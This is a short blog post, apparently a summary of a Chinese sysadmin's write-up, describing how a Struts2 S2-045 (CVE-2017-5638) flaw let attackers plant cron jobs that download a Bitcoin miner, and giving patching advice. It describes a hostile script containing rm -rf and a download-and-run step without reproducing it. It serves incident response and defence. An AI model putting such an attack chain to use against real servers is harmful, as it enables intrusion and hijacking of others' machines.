How a Struts2 RCE Vulnerability Turned My Linux Server into a Bitcoin Miner

Introduction

In 2011 a college student asked for investment advice and was told to buy Bitcoin and forget about the money; five years later that advice resurfaced as a popular answer on Zhihu.

Cause

The author describes a Linux server protected by external and internal firewalls that was unexpectedly attacked. A suspicious process atd consumed nearly 600% CPU. Using ps -eaf | grep atd the process was identified and killed with kill -9 17257, but it reappeared minutes later.

Investigation of scheduled tasks with crontab -l revealed unknown entries pointing to a malicious URL. The response from that URL contained a script with a rm -rf command and evidence of a Struts2 exploit that downloaded and launched a Bitcoin mining payload.

Further analysis showed code related to a Struts2 OGNL injection (CVE‑2017‑5638, S2‑045) used to create crontab entries and execute the miner on vulnerable Linux servers.

Mining Organization

Struts2 remote code execution vulnerabilities have been disclosed since 2010 (S2‑005, S2‑009, S2‑013, S2‑016, S2‑019, S2‑020, S2‑032, S2‑037, devMode, and the 2017 S2‑045). Each disclosure triggered widespread scanning attacks. The recent attack exploited S2‑045, allowing attackers to upload malicious files via crafted Content‑Type headers, leading to Bitcoin mining on compromised servers.

Analysis of network traffic showed IP addresses associated with an organized mining group targeting vulnerable Struts2 installations.

Solution

Upgrade Struts2 to version 2.5.10 or later to patch the high‑severity vulnerability. If upgrading is not possible, consider disabling file uploads or restricting execution privileges, as the mining activity does not damage data but consumes resources and can lead to further compromise.

Author: 小柒 Source: http://www.cnblogs.com/smallSevens/p/7554380.html